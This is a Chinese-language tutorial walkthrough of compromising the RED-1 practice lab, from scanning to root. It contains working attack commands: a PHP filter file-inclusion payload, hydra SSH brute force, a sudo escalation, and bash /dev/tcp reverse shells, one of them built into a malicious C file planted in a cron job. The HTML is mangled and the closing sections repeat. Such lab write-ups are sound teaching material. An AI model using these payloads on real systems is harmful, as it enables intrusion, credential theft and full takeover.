RED-1 靶场渗透测试教学文档<\/h1>

靶场概述<\/h2>
RED-1 是一个包含后门漏洞的Linux靶场，渗透路径涉及信息收集、漏洞发现、Web应用攻击、SSH爆破、权限提升等多个环节。本教学文档将详细记录整个渗透过程。<\/p>

1. 信息收集阶段<\/h2>

1.1 网络扫描<\/h3>

# 扫描同网段存活主机<\/span>
<\/span><\/span>nmap -sn 192.168.213.0\/24
<\/span><\/span>
<\/span><\/span># 确定目标IP后，进行全端口扫描<\/span>
<\/span><\/span>nmap -p- 192.168.213.142
<\/span><\/span><\/code><\/pre>1.2 Web应用信息收集<\/h3>

访问80端口发现网站被攻击提示，存在后门文件<\/li>
查看网页源代码发现隐藏主机地址：redrocks.win<\/li>
在本地配置hosts映射：<\/li>
<\/ul>
vim \/etc\/hosts
<\/span><\/span># 添加：192.168.213.142 redrocks.win<\/span>
<\/span><\/span><\/code><\/pre>2. 漏洞发现<\/h2>
2.1 目录扫描<\/h3>
使用gobuster进行目录扫描：<\/p>
gobuster dir -u http:\/\/redrocks.win -w \/path\/to\/wordlist.txt
<\/span><\/span><\/code><\/pre>发现敏感文件：NetworkFileManagerPHP.php<\/code>（返回500状态码）<\/p>
2.2 参数模糊测试<\/h3>
使用wfuzz测试参数：<\/p>
wfuzz -c -w \/path\/to\/param_wordlist.txt http:\/\/redrocks.win\/NetworkFileManagerPHP.php?FUZZ=<\/span>test
<\/span><\/span><\/code><\/pre>发现有效参数：key<\/code><\/p>
3. 漏洞利用与Getshell<\/h2>
3.1 文件包含漏洞利用<\/h3>
使用PHP伪协议读取文件内容：<\/p>
http:\/\/redrocks.win\/NetworkFileManagerPHP.php?key=php:\/\/filter\/convert.base64-encode\/resource=NetworkFileManagerPHP.php
<\/code><\/pre>
解码后得到提示：

"That password alone won't help you! Hashcat says rules are rules"<\/p>
3.2 数据库配置文件读取<\/h3>
同样方法读取wp-config.php文件，发现数据库凭据：<\/p>

用户名：john<\/li>
密码：R3v_m4lwh3r3_k1nG<\/li>
<\/ul>
3.3 SSH爆破<\/h3>

创建密码文件pass.txt，应用Hashcat的Best64规则<\/li>
使用hydra爆破SSH：<\/li>
<\/ol>
hydra -l john -P pass.txt ssh:\/\/192.168.213.142
<\/span><\/span><\/code><\/pre>成功获取有效凭据<\/p>
4. 权限提升<\/h2>
4.1 初始访问<\/h3>
使用爆破得到的凭据登录SSH：<\/p>
ssh john@192.168.213.142
<\/span><\/span><\/code><\/pre>发现系统命令被修改（cat和vim互换）<\/p>
4.2 查看sudo权限<\/h3>
sudo -l
<\/span><\/span><\/code><\/pre>发现ippsec用户可以无密码执行：<\/p>
\/usr\/bin\/time
<\/span><\/span><\/code><\/pre>4.3 提权至ippsec用户<\/h3>
sudo -u ippsec \/usr\/bin\/time \/bin\/bash
<\/span><\/span><\/code><\/pre>4.4 获取稳定shell<\/h3>

创建反弹shell脚本shell.sh：<\/li>
<\/ol>
bash -c 'bash -i >& \/dev\/tcp\/192.168.213.129\/4444 0>&1'<\/span>
<\/span><\/span><\/code><\/pre>
本地监听：<\/li>
<\/ol>
nc -lvnp 4444<\/span>
<\/span><\/span><\/code><\/pre>
升级shell：<\/li>
<\/ol>
python3 -c 'import pty;pty.spawn("\/bin\/bash")'<\/span>
<\/span><\/span>export TERM=<\/span>xterm
<\/span><\/span># Ctrl+Z<\/span>
<\/span><\/span>stty raw -echo;fg
<\/span><\/span>reset
<\/span><\/span><\/code><\/pre>4.5 定时任务提权<\/h3>

使用pspy64s监听进程：<\/li>
<\/ol>
wget https:\/\/github.com\/DominicBreuker\/pspy\/releases\/download\/v1.2.0\/pspy64s
<\/span><\/span>chmod +x pspy64s
<\/span><\/span>.\/pspy64s
<\/span><\/span><\/code><\/pre>
发现定时执行的.c文件<\/li>
创建恶意.c文件替换原文件：<\/li>
<\/ol>
\/\/ 反弹root shell的代码
<\/span><\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span><\/span>int<\/span> main<\/span>(){
<\/span><\/span>    system("bash -c 'bash -i >& \/dev\/tcp\/192.168.213.129\/5555 0>&1'"<\/span>);
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
本地监听5555端口获取root shell<\/li>
<\/ol>
5. 总结与关键点<\/h2>

信息收集要全面<\/strong>：从网络扫描到源代码审查，每个细节都可能包含关键信息<\/li>
伪协议利用<\/strong>：PHP的filter协议在文件包含漏洞中非常有用<\/li>
密码规则提示<\/strong>：当遇到密码相关提示时，考虑Hashcat的各种规则<\/li>
sudo权限检查<\/strong>：sudo -l<\/code>是提权的重要步骤<\/li>
不稳定shell处理<\/strong>：使用python或socat升级shell稳定性<\/li>
定时任务提权<\/strong>：通过替换定时任务执行的程序是有效的提权方法<\/li>
工具使用<\/strong>：熟练使用nmap、gobuster、wfuzz、hydra、pspy等工具<\/li>
<\/ol>
防御建议<\/h2>

避免在源代码中留下敏感信息<\/li>
禁用不必要的PHP伪协议<\/li>
使用强密码并定期更换<\/li>
限制sudo权限，遵循最小权限原则<\/li>
监控系统定时任务和异常进程<\/li>
定期进行安全审计和渗透测试<\/li>
<\/ol>

RED-1 靶场渗透测试教学文档<\/h1>

靶场概述<\/h2> RED-1 是一个包含后门漏洞的Linux靶场，渗透路径涉及信息收集、漏洞发现、Web应用攻击、SSH爆破、权限提升等多个环节。本教学文档将详细记录整个渗透过程。<\/p>

1. 信息收集阶段<\/h2>

2. 漏洞发现<\/h2>

4. 权限提升<\/h2>

防御建议<\/h2> 避免在源代码中留下敏感信息<\/li> 禁用不必要的PHP伪协议<\/li> 使用强密码并定期更换<\/li> 限制sudo权限，遵循最小权限原则<\/li> 监控系统定时任务和异常进程<\/li> 定期进行安全审计和渗透测试<\/li> <\/ol>

靶场概述<\/h2>
RED-1 是一个包含后门漏洞的Linux靶场，渗透路径涉及信息收集、漏洞发现、Web应用攻击、SSH爆破、权限提升等多个环节。本教学文档将详细记录整个渗透过程。<\/p>

防御建议<\/h2>

避免在源代码中留下敏感信息<\/li>
禁用不必要的PHP伪协议<\/li>
使用强密码并定期更换<\/li>
限制sudo权限，遵循最小权限原则<\/li>
监控系统定时任务和异常进程<\/li>
定期进行安全审计和渗透测试<\/li> <\/ol>